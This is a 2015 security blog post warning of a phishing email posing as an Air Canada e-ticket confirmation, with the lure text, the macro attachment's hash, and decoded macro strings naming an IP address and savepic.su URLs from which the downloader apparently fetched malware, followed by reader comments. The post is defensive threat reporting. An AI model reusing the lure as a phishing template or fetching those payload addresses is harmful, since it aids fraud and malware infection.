Tuesday, 3 March 2015

Air Canada e-ticket Order malware

Air Canada e-ticket Order malware

Headers:
From: "Air Canada" {tickets@aircanada.com}
Subject: Order # 79010838 - Completed

Message body:

 Dear client,

   Your online order has been successfully completed and your credit card has been charged.

    FLIGHT NUMBER CX89014CA
    DATE & TIME / MARCH 6rd , 14:15
    DEPARTURE / Toronto
    TOTAL PRICE / 450 CAD

    The seat number and additional information regarding the flight can be found on the attached e-ticket.

    Thank you for choosing Air Canada


Attached is a Word Document containing macros
e-ticket_79010838.doc
Sha256 Hash:
be34ee5a30cef8269efda392939e753e71eae513e8eb714c90c685a4677a5375   [1]

Malware Information:

VirusTotal Report [1] (hits 2/57 Virus Scanners)
Decoded Macro [Pastebin] [1]

    URLLSK = "91.220.131.73/ca/file"
    STAA = "savepic.su/5229109"
    STAB = "savepic.su/5220917"
 


Cheers,

Steve
Sanesecurity.com

5 comments:

Anonymous said...

So what exactly does this particular "W97M/Downloader.adx" do?

Anonymous said...

So what does this "W97M/Downloader.adx" do exactly?

Anonymous said...

Ok, so I got this email 6 hours ago and stupidly opened it, since it looked like my upcoming trip to Toronto. I scanned with Avast and it says I'm clean, but am I really? What file(s) should I be looking for to delete from my system?

Anonymous said...

OK. so I stupidly opened the attachment when I got this email, since it looked like my travel info for my upcoming trip to Toronto. I deleted the file as soon as it opened, then ran Avast AV software and it says I'm clean, but am I really? What file(s) should I be searching for to delete from my PC? Any help would be appreciated!

Steve Basford said...

If you opened it the document with macros enables, its worth using Eset etc. from the online scans tab, http://sanesecurity.blogspot.co.uk/p/online-scanners.html